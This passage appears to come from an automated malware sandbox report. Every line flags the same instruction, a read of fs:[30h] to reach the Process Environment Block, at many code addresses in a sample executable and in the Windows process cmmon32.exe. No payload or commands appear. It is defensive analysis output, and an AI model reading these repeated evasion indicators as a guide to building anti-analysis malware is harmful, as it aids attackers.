          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01904015 mov eax, dword ptr fs:[00000030h]2_2_01904015
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h]2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h]2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h]2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h]2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h]2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h]2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h]2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h]2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h]2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h]2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h]2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h]2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h]2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h]2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B7016 mov eax, dword ptr fs:[00000030h]2_2_018B7016
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B7016 mov eax, dword ptr fs:[00000030h]2_2_018B7016
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B7016 mov eax, dword ptr fs:[00000030h]2_2_018B7016
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0190740D mov eax, dword ptr fs:[00000030h]2_2_0190740D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0190740D mov eax, dword ptr fs:[00000030h]2_2_0190740D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0190740D mov eax, dword ptr fs:[00000030h]2_2_0190740D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186BC2C mov eax, dword ptr fs:[00000030h]2_2_0186BC2C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186002D mov eax, dword ptr fs:[00000030h]2_2_0186002D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186002D mov eax, dword ptr fs:[00000030h]2_2_0186002D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186002D mov eax, dword ptr fs:[00000030h]2_2_0186002D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186002D mov eax, dword ptr fs:[00000030h]2_2_0186002D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186002D mov eax, dword ptr fs:[00000030h]2_2_0186002D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184B02A mov eax, dword ptr fs:[00000030h]2_2_0184B02A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184B02A mov eax, dword ptr fs:[00000030h]2_2_0184B02A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184B02A mov eax, dword ptr fs:[00000030h]2_2_0184B02A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184B02A mov eax, dword ptr fs:[00000030h]2_2_0184B02A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186A44B mov eax, dword ptr fs:[00000030h]2_2_0186A44B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01850050 mov eax, dword ptr fs:[00000030h]2_2_01850050
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01850050 mov eax, dword ptr fs:[00000030h]2_2_01850050
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018CC450 mov eax, dword ptr fs:[00000030h]2_2_018CC450
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018CC450 mov eax, dword ptr fs:[00000030h]2_2_018CC450
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01901074 mov eax, dword ptr fs:[00000030h]2_2_01901074
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185746D mov eax, dword ptr fs:[00000030h]2_2_0185746D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F2073 mov eax, dword ptr fs:[00000030h]2_2_018F2073
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F138A mov eax, dword ptr fs:[00000030h]2_2_018F138A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01841B8F mov eax, dword ptr fs:[00000030h]2_2_01841B8F
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01841B8F mov eax, dword ptr fs:[00000030h]2_2_01841B8F
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018ED380 mov ecx, dword ptr fs:[00000030h]2_2_018ED380
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01848794 mov eax, dword ptr fs:[00000030h]2_2_01848794
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01862397 mov eax, dword ptr fs:[00000030h]2_2_01862397
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186B390 mov eax, dword ptr fs:[00000030h]2_2_0186B390
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B7794 mov eax, dword ptr fs:[00000030h]2_2_018B7794
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B7794 mov eax, dword ptr fs:[00000030h]2_2_018B7794
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B7794 mov eax, dword ptr fs:[00000030h]2_2_018B7794
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01864BAD mov eax, dword ptr fs:[00000030h]2_2_01864BAD
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01864BAD mov eax, dword ptr fs:[00000030h]2_2_01864BAD
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01864BAD mov eax, dword ptr fs:[00000030h]2_2_01864BAD
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01905BA5 mov eax, dword ptr fs:[00000030h]2_2_01905BA5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B53CA mov eax, dword ptr fs:[00000030h]2_2_018B53CA
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B53CA mov eax, dword ptr fs:[00000030h]2_2_018B53CA
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018603E2 mov eax, dword ptr fs:[00000030h]2_2_018603E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018603E2 mov eax, dword ptr fs:[00000030h]2_2_018603E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018603E2 mov eax, dword ptr fs:[00000030h]2_2_018603E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018603E2 mov eax, dword ptr fs:[00000030h]2_2_018603E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018603E2 mov eax, dword ptr fs:[00000030h]2_2_018603E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018603E2 mov eax, dword ptr fs:[00000030h]2_2_018603E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185DBE9 mov eax, dword ptr fs:[00000030h]2_2_0185DBE9
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018737F5 mov eax, dword ptr fs:[00000030h]2_2_018737F5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186A70E mov eax, dword ptr fs:[00000030h]2_2_0186A70E
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186A70E mov eax, dword ptr fs:[00000030h]2_2_0186A70E
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185F716 mov eax, dword ptr fs:[00000030h]2_2_0185F716
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F131B mov eax, dword ptr fs:[00000030h]2_2_018F131B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018CFF10 mov eax, dword ptr fs:[00000030h]2_2_018CFF10
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018CFF10 mov eax, dword ptr fs:[00000030h]2_2_018CFF10
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0190070D mov eax, dword ptr fs:[00000030h]2_2_0190070D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0190070D mov eax, dword ptr fs:[00000030h]2_2_0190070D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01834F2E mov eax, dword ptr fs:[00000030h]2_2_01834F2E
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01834F2E mov eax, dword ptr fs:[00000030h]2_2_01834F2E
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186E730 mov eax, dword ptr fs:[00000030h]2_2_0186E730
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183DB40 mov eax, dword ptr fs:[00000030h]2_2_0183DB40
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184EF40 mov eax, dword ptr fs:[00000030h]2_2_0184EF40
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01908B58 mov eax, dword ptr fs:[00000030h]2_2_01908B58
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183F358 mov eax, dword ptr fs:[00000030h]2_2_0183F358
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183DB60 mov ecx, dword ptr fs:[00000030h]2_2_0183DB60
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184FF60 mov eax, dword ptr fs:[00000030h]2_2_0184FF60
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01908F6A mov eax, dword ptr fs:[00000030h]2_2_01908F6A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01863B7A mov eax, dword ptr fs:[00000030h]2_2_01863B7A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01863B7A mov eax, dword ptr fs:[00000030h]2_2_01863B7A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018CFE87 mov eax, dword ptr fs:[00000030h]2_2_018CFE87
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186D294 mov eax, dword ptr fs:[00000030h]2_2_0186D294
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186D294 mov eax, dword ptr fs:[00000030h]2_2_0186D294
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018352A5 mov eax, dword ptr fs:[00000030h]2_2_018352A5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018352A5 mov eax, dword ptr fs:[00000030h]2_2_018352A5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018352A5 mov eax, dword ptr fs:[00000030h]2_2_018352A5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018352A5 mov eax, dword ptr fs:[00000030h]2_2_018352A5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018352A5 mov eax, dword ptr fs:[00000030h]2_2_018352A5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B46A7 mov eax, dword ptr fs:[00000030h]2_2_018B46A7
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184AAB0 mov eax, dword ptr fs:[00000030h]2_2_0184AAB0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184AAB0 mov eax, dword ptr fs:[00000030h]2_2_0184AAB0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01900EA5 mov eax, dword ptr fs:[00000030h]2_2_01900EA5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01900EA5 mov eax, dword ptr fs:[00000030h]2_2_01900EA5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01900EA5 mov eax, dword ptr fs:[00000030h]2_2_01900EA5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186FAB0 mov eax, dword ptr fs:[00000030h]2_2_0186FAB0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01878EC7 mov eax, dword ptr fs:[00000030h]2_2_01878EC7
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01908ED6 mov eax, dword ptr fs:[00000030h]2_2_01908ED6
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018636CC mov eax, dword ptr fs:[00000030h]2_2_018636CC
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01862ACB mov eax, dword ptr fs:[00000030h]2_2_01862ACB
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018EFEC0 mov eax, dword ptr fs:[00000030h]2_2_018EFEC0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01862AE4 mov eax, dword ptr fs:[00000030h]2_2_01862AE4
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018616E0 mov ecx, dword ptr fs:[00000030h]2_2_018616E0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018476E2 mov eax, dword ptr fs:[00000030h]2_2_018476E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183C600 mov eax, dword ptr fs:[00000030h]2_2_0183C600
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183C600 mov eax, dword ptr fs:[00000030h]2_2_0183C600
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183C600 mov eax, dword ptr fs:[00000030h]2_2_0183C600
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01868E00 mov eax, dword ptr fs:[00000030h]2_2_01868E00
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1608 mov eax, dword ptr fs:[00000030h]2_2_018F1608
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01848A0A mov eax, dword ptr fs:[00000030h]2_2_01848A0A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01835210 mov eax, dword ptr fs:[00000030h]2_2_01835210
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01835210 mov ecx, dword ptr fs:[00000030h]2_2_01835210
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01835210 mov eax, dword ptr fs:[00000030h]2_2_01835210
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01835210 mov eax, dword ptr fs:[00000030h]2_2_01835210
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183AA16 mov eax, dword ptr fs:[00000030h]2_2_0183AA16
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183AA16 mov eax, dword ptr fs:[00000030h]2_2_0183AA16
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01853A1C mov eax, dword ptr fs:[00000030h]2_2_01853A1C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186A61C mov eax, dword ptr fs:[00000030h]2_2_0186A61C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186A61C mov eax, dword ptr fs:[00000030h]2_2_0186A61C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183E620 mov eax, dword ptr fs:[00000030h]2_2_0183E620
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01874A2C mov eax, dword ptr fs:[00000030h]2_2_01874A2C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01874A2C mov eax, dword ptr fs:[00000030h]2_2_01874A2C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018EFE3F mov eax, dword ptr fs:[00000030h]2_2_018EFE3F
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01839240 mov eax, dword ptr fs:[00000030h]2_2_01839240
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01839240 mov eax, dword ptr fs:[00000030h]2_2_01839240
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01839240 mov eax, dword ptr fs:[00000030h]2_2_01839240
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01839240 mov eax, dword ptr fs:[00000030h]2_2_01839240
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01847E41 mov eax, dword ptr fs:[00000030h]2_2_01847E41
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01847E41 mov eax, dword ptr fs:[00000030h]2_2_01847E41
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01847E41 mov eax, dword ptr fs:[00000030h]2_2_01847E41
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01847E41 mov eax, dword ptr fs:[00000030h]2_2_01847E41
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01847E41 mov eax, dword ptr fs:[00000030h]2_2_01847E41
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01847E41 mov eax, dword ptr fs:[00000030h]2_2_01847E41
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018FAE44 mov eax, dword ptr fs:[00000030h]2_2_018FAE44
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018FAE44 mov eax, dword ptr fs:[00000030h]2_2_018FAE44
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018FEA55 mov eax, dword ptr fs:[00000030h]2_2_018FEA55
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018C4257 mov eax, dword ptr fs:[00000030h]2_2_018C4257
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184766D mov eax, dword ptr fs:[00000030h]2_2_0184766D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018EB260 mov eax, dword ptr fs:[00000030h]2_2_018EB260
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018EB260 mov eax, dword ptr fs:[00000030h]2_2_018EB260
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01908A62 mov eax, dword ptr fs:[00000030h]2_2_01908A62
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185AE73 mov eax, dword ptr fs:[00000030h]2_2_0185AE73
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185AE73 mov eax, dword ptr fs:[00000030h]2_2_0185AE73
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185AE73 mov eax, dword ptr fs:[00000030h]2_2_0185AE73
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185AE73 mov eax, dword ptr fs:[00000030h]2_2_0185AE73
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185AE73 mov eax, dword ptr fs:[00000030h]2_2_0185AE73
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0187927A mov eax, dword ptr fs:[00000030h]2_2_0187927A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484849B mov eax, dword ptr fs:[00000030h]11_2_0484849B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04908CD6 mov eax, dword ptr fs:[00000030h]11_2_04908CD6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F14FB mov eax, dword ptr fs:[00000030h]11_2_048F14FB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6CF0 mov eax, dword ptr fs:[00000030h]11_2_048B6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6CF0 mov eax, dword ptr fs:[00000030h]11_2_048B6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6CF0 mov eax, dword ptr fs:[00000030h]11_2_048B6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6C0A mov eax, dword ptr fs:[00000030h]11_2_048B6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6C0A mov eax, dword ptr fs:[00000030h]11_2_048B6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6C0A mov eax, dword ptr fs:[00000030h]11_2_048B6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6C0A mov eax, dword ptr fs:[00000030h]11_2_048B6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0490740D mov eax, dword ptr fs:[00000030h]11_2_0490740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0490740D mov eax, dword ptr fs:[00000030h]11_2_0490740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0490740D mov eax, dword ptr fs:[00000030h]11_2_0490740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486BC2C mov eax, dword ptr fs:[00000030h]11_2_0486BC2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486A44B mov eax, dword ptr fs:[00000030h]11_2_0486A44B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CC450 mov eax, dword ptr fs:[00000030h]11_2_048CC450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CC450 mov eax, dword ptr fs:[00000030h]11_2_048CC450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485746D mov eax, dword ptr fs:[00000030h]11_2_0485746D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04862581 mov eax, dword ptr fs:[00000030h]11_2_04862581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04862581 mov eax, dword ptr fs:[00000030h]11_2_04862581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04862581 mov eax, dword ptr fs:[00000030h]11_2_04862581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04862581 mov eax, dword ptr fs:[00000030h]11_2_04862581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04832D8A mov eax, dword ptr fs:[00000030h]11_2_04832D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04832D8A mov eax, dword ptr fs:[00000030h]11_2_04832D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04832D8A mov eax, dword ptr fs:[00000030h]11_2_04832D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04832D8A mov eax, dword ptr fs:[00000030h]11_2_04832D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04832D8A mov eax, dword ptr fs:[00000030h]11_2_04832D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486FD9B mov eax, dword ptr fs:[00000030h]11_2_0486FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486FD9B mov eax, dword ptr fs:[00000030h]11_2_0486FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048635A1 mov eax, dword ptr fs:[00000030h]11_2_048635A1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04861DB5 mov eax, dword ptr fs:[00000030h]11_2_04861DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04861DB5 mov eax, dword ptr fs:[00000030h]11_2_04861DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04861DB5 mov eax, dword ptr fs:[00000030h]11_2_04861DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_049005AC mov eax, dword ptr fs:[00000030h]11_2_049005AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_049005AC mov eax, dword ptr fs:[00000030h]11_2_049005AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6DC9 mov eax, dword ptr fs:[00000030h]11_2_048B6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6DC9 mov eax, dword ptr fs:[00000030h]11_2_048B6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6DC9 mov eax, dword ptr fs:[00000030h]11_2_048B6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6DC9 mov ecx, dword ptr fs:[00000030h]11_2_048B6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6DC9 mov eax, dword ptr fs:[00000030h]11_2_048B6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6DC9 mov eax, dword ptr fs:[00000030h]11_2_048B6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484D5E0 mov eax, dword ptr fs:[00000030h]11_2_0484D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484D5E0 mov eax, dword ptr fs:[00000030h]11_2_0484D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FFDE2 mov eax, dword ptr fs:[00000030h]11_2_048FFDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FFDE2 mov eax, dword ptr fs:[00000030h]11_2_048FFDE2
